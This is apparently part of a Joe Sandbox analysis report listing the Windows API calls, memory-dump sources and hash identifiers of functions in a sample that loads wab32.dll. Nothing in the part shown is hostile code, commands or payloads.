                                                                                • Part of subcall function 006228A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0062290A
                                                                                • Part of subcall function 006228A4: RegQueryValueExW.KERNELBASE(?,006211FC,00000000,?,?,?,?,00000000,00000000), ref: 0062293F
                                                                                • Part of subcall function 006228A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0062295F
                                                                                • Part of subcall function 006228A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00622997
                                                                              • PathRemoveFileSpecW.SHLWAPI(?,?), ref: 00621C1E
                                                                              • PathAppendW.SHLWAPI(?,wab32res.dll), ref: 00621C34
                                                                              • LoadLibraryW.KERNELBASE(?), ref: 00621C45
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: Path$AppendCloseEnvironmentExpandFileLibraryLoadOpenQueryRemoveSpecStringsValuememset
                                                                              • String ID: wab32res.dll
                                                                              • API String ID: 1705514897-2698570859
                                                                              • Opcode ID: 6d9d047775cebefb325e4072d5270867df8f985d75b38b9bb7a5c8cf73f3fac3
                                                                              • Instruction ID: 7d7afc14c2bba4e73837e1167ebda022dbd463df81776fa22a5e6bf586fd345b
                                                                              • Opcode Fuzzy Hash: 6d9d047775cebefb325e4072d5270867df8f985d75b38b9bb7a5c8cf73f3fac3
                                                                              • Instruction Fuzzy Hash: CBF09075A02A28ABCB20EBB4AC08AAD77BAAB04300F504199A512D7241DB34DE05CE90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              • Graph: entry block 621b83 (rendered control-flow graph not reproduced; API calls are listed under APIs below)
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00621BA8
                                                                                • Part of subcall function 006228A4: memset.MSVCRT ref: 006228DE
                                                                                • Part of subcall function 006228A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0062290A
                                                                                • Part of subcall function 006228A4: RegQueryValueExW.KERNELBASE(?,006211FC,00000000,?,?,?,?,00000000,00000000), ref: 0062293F
                                                                                • Part of subcall function 006228A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0062295F
                                                                                • Part of subcall function 006228A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00622997
                                                                              • LoadLibraryW.KERNELBASE(?,?,00000000), ref: 00621BE2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: memset$CloseEnvironmentExpandLibraryLoadOpenQueryStringsValue
                                                                              • String ID: wab32.dll
                                                                              • API String ID: 2792020168-2849205143
                                                                              • Opcode ID: 517c46538207e68773f6a657b8631b84b4e8ad39005a16e9471fbe506be0b697
                                                                              • Instruction ID: 3e72a1bb5db63f769f9ee8dacc48e6f3a2352ef0f041de0174ee74404e40088a
                                                                              • Opcode Fuzzy Hash: 517c46538207e68773f6a657b8631b84b4e8ad39005a16e9471fbe506be0b697
                                                                              • Instruction Fuzzy Hash: ABF0217540163857CF34EB64EC5DAEA777ADF50300F904198E8179B281EA345F49CE84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              • Graph: entry block 6229ab (rendered control-flow graph not reproduced; API calls are listed under APIs below)
                                                                              APIs
                                                                              • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 006229C0
                                                                              • LocalFree.KERNEL32(00000000,?), ref: 006229DE
                                                                              • RegisterApplicationRestart.KERNELBASE(00621428,00000000,00000000), ref: 00622A0B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: ApplicationArgvCommandFreeLineLocalRegisterRestart
                                                                              • String ID:
                                                                              • API String ID: 3182635576-0
                                                                              • Opcode ID: 86cd3502429fe9d3a745406c55240806cf7f52f5f02cf22fa1feff7a89246978
                                                                              • Instruction ID: c7f33df64b7b811fad25f3ef64ac761c9cd03aef852828b313c21d99a929bd56
                                                                              • Opcode Fuzzy Hash: 86cd3502429fe9d3a745406c55240806cf7f52f5f02cf22fa1feff7a89246978
                                                                              • Instruction Fuzzy Hash: 7201B572900A2ABBDB21CBD4ECD8BADB7BDEB44361F500165E501E7200DB749E01CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              • Graph: single block 623001-623022 calling __getmainargs (rendered control-flow graph not reproduced)
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: __getmainargs
                                                                              • String ID:
                                                                              • API String ID: 3565562838-0
                                                                              • Opcode ID: 0ab45844629f2843bd0f1f85e2239451402639986d046c76ecb9fdccb2cc4791
                                                                              • Instruction ID: d949c371cedf908f9fb8e0a2786797424920bc495f72f256522f233d28b9bd39
                                                                              • Opcode Fuzzy Hash: 0ab45844629f2843bd0f1f85e2239451402639986d046c76ecb9fdccb2cc4791
                                                                              • Instruction Fuzzy Hash: D9C08CB1540E90AB8320DB54BC03B803712EA517007030054A322A70A1DE680086CE69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph: entry block 6225d3-62265b (memset * 2, CommandLineToArgvW); other blocks call StrCmpNIW, LocalFree, PathFindExtensionW, StrCmpIW, GetFileAttributesW, PathRemoveFileSpecW and subroutines 621a60, 621b57, 622b60, 6232b0
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0062261B
                                                                              • memset.MSVCRT ref: 00622633
                                                                              • CommandLineToArgvW.SHELL32(00000000,?,?,?,?,00000000,00000000,00000001), ref: 0062264D
                                                                              • StrCmpNIW.SHLWAPI(?,/LDAP:,00000006,?,?,?,00000000,00000000,00000001), ref: 0062268D
                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,00000001), ref: 0062287E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: memset$ArgvCommandFreeLineLocal
                                                                              • String ID: /LDAP:
                                                                              • API String ID: 439219084-3282177907
                                                                              • Opcode ID: c97199de566d197a9bdc698e2749c2995025812d22600a2743233cfbdd77b9f7
                                                                              • Instruction ID: b67a9b5ff34df79b1559f425c545014341f608cbd67aca93f9e135d8b4136e64
                                                                              • Opcode Fuzzy Hash: c97199de566d197a9bdc698e2749c2995025812d22600a2743233cfbdd77b9f7
                                                                              • Instruction Fuzzy Hash: 08819075A00A29ABCB34DF24EC98AE9B3B7BF58300F1441A9E51A9B351D734DE858F50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph: entry block 623675-623698; block 62369e-6236eb calls GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter
                                                                              APIs
                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 006236A2
                                                                              • GetCurrentProcessId.KERNEL32 ref: 006236B1
                                                                              • GetCurrentThreadId.KERNEL32 ref: 006236BA
                                                                              • GetTickCount.KERNEL32 ref: 006236C3
                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 006236D8
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                              • String ID:
                                                                              • API String ID: 1445889803-0
                                                                              • Opcode ID: 6ba3e67178cedfa27f067840d3f7e72e21304edf4c02a5177085384e0b7ed2f5
                                                                              • Instruction ID: 654990140a79d3711450b882b2e849c44cb6ee4da058600292e55bcfd854aeff
                                                                              • Opcode Fuzzy Hash: 6ba3e67178cedfa27f067840d3f7e72e21304edf4c02a5177085384e0b7ed2f5
                                                                              • Instruction Fuzzy Hash: 72110A71D01A18EBCB20DFB8EA48ADEBBF6EF58350F515455D502EB310EB349A418F40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,006233F6,`@b), ref: 006232C7
                                                                              • UnhandledExceptionFilter.KERNEL32(006233F6,?,006233F6,`@b), ref: 006232D0
                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,006233F6,`@b), ref: 006232DB
                                                                              • TerminateProcess.KERNEL32(00000000,?,006233F6,`@b), ref: 006232E2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                              • String ID:
                                                                              • API String ID: 3231755760-0
                                                                              • Opcode ID: b8a5a67387fa33d1952ebb10b4140b5446a4946d2eee9c3646930c4f0a92a321
                                                                              • Instruction ID: b1add3a6e2bdfac45941d0961f4119a6b13f2abf724c0fa194bcea87ab482907
                                                                              • Opcode Fuzzy Hash: b8a5a67387fa33d1952ebb10b4140b5446a4946d2eee9c3646930c4f0a92a321
                                                                              • Instruction Fuzzy Hash: 69D0E972044D04AFDB302BE1ED0DE593E2AFB44766F459410F70FC6465DA7154528BA6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000001,00622589), ref: 00621B09
                                                                              • HeapFree.KERNEL32(00000000), ref: 00621B10
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 3859560861-0
                                                                              • Opcode ID: 5cdc4196204ced70eb789f325c8e75fc968381cc2fa74c962da4b9c4a3b5945d
                                                                              • Instruction ID: 9f63146d926402d14c87ccb5c64ae00e8b636b7f684e19a0a27e8cbef041b6b7
                                                                              • Opcode Fuzzy Hash: 5cdc4196204ced70eb789f325c8e75fc968381cc2fa74c962da4b9c4a3b5945d
                                                                              • Instruction Fuzzy Hash: 90E06D71605B118FCB344FAA9994962BBEAFF25302314482EE99A87610C631D840CF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00003400), ref: 00623455
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 5b102da509c5afa91ff3520d03d5afa2f9ebed63a0d79c1e785c0a3edf59b0ac
                                                                              • Instruction ID: eb21db9d5e48575844a98c40ebf20887b4d65ee07698a51059d6db1b194f8c2c
                                                                              • Opcode Fuzzy Hash: 5b102da509c5afa91ff3520d03d5afa2f9ebed63a0d79c1e785c0a3edf59b0ac
                                                                              • Instruction Fuzzy Hash: 39900260355D2046472527706C1E91529D26A58B0B7835490A006C5158DB6451025951
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 5b
                                                                              • API String ID: 0-3854325342
                                                                              • Opcode ID: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                              • Instruction ID: 17186d36360fe01d84c99af4783ccf80ac3cf2f0c35744e0a3a89fcb37f88023
                                                                              • Opcode Fuzzy Hash: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                              • Instruction Fuzzy Hash: FFF0A7337041315B8B448B4EEC8097EB3DBDEC4B3471980A9E50C9B301DB38ED428A94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph: entry block 622a7e-622a8c; block 622ac9-622add calls GetProcessHeap and HeapAlloc, block 622ae5-622afd calls memcpy, block 622b33-622b3e calls GetProcessHeap and HeapFree
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000000,m(b,?,00622BA4,?,?,8000FFFF,00000000,?,?,?,0062286D,?), ref: 00622ACC
                                                                              • HeapAlloc.KERNEL32(00000000,?,00622BA4,?,?,8000FFFF,00000000,?,?,?,0062286D,?,?), ref: 00622AD3
                                                                              • memcpy.MSVCRT ref: 00622AEB
                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,00622BA4,?,?,8000FFFF,00000000,?,?,?,0062286D,?,?), ref: 00622B37
                                                                              • HeapFree.KERNEL32(00000000,?,00622BA4,?,?,8000FFFF,00000000,?,?,?,0062286D,?,?), ref: 00622B3E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$AllocFreememcpy
                                                                              • String ID: m(b
                                                                              • API String ID: 3405790324-1102000063
                                                                              • Opcode ID: 7f033d902de37488d3c80d46066d09239e6645214c60bd8632af87a50dd3460d
                                                                              • Instruction ID: 94398edb5b713e5ac94aa8ff075aa2ddd3e31c12d333258ef842cfb88fce3bc8
                                                                              • Opcode Fuzzy Hash: 7f033d902de37488d3c80d46066d09239e6645214c60bd8632af87a50dd3460d
                                                                              • Instruction Fuzzy Hash: 1F21E471A00E23BBDB355E2CE9A4B95BBA7BB04319F104225E9158B790DB74DC51CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 006234D8: GetModuleHandleW.KERNEL32(00000000), ref: 006234DF
                                                                              • __set_app_type.MSVCRT ref: 00622F92
                                                                              • __p__fmode.MSVCRT ref: 00622FA8
                                                                              • __p__commode.MSVCRT ref: 00622FB6
                                                                              • __setusermatherr.MSVCRT ref: 00622FD7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                              • String ID:
                                                                              • API String ID: 1632413811-0
                                                                              • Opcode ID: 1322e37e0e94b6a165ea9656a0f2ea9b242e19bdfc2b507f896561870281457e
                                                                              • Instruction ID: 5daaf666d6420f74d5c3e04cf4948434641eee7e31e542185cba1def3b58e5e8
                                                                              • Opcode Fuzzy Hash: 1322e37e0e94b6a165ea9656a0f2ea9b242e19bdfc2b507f896561870281457e
                                                                              • Instruction Fuzzy Hash: 41F01CB0544F20CFC738AB30BD0E6143BA3BB04321B11660AE962963F1DF398142CE14
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%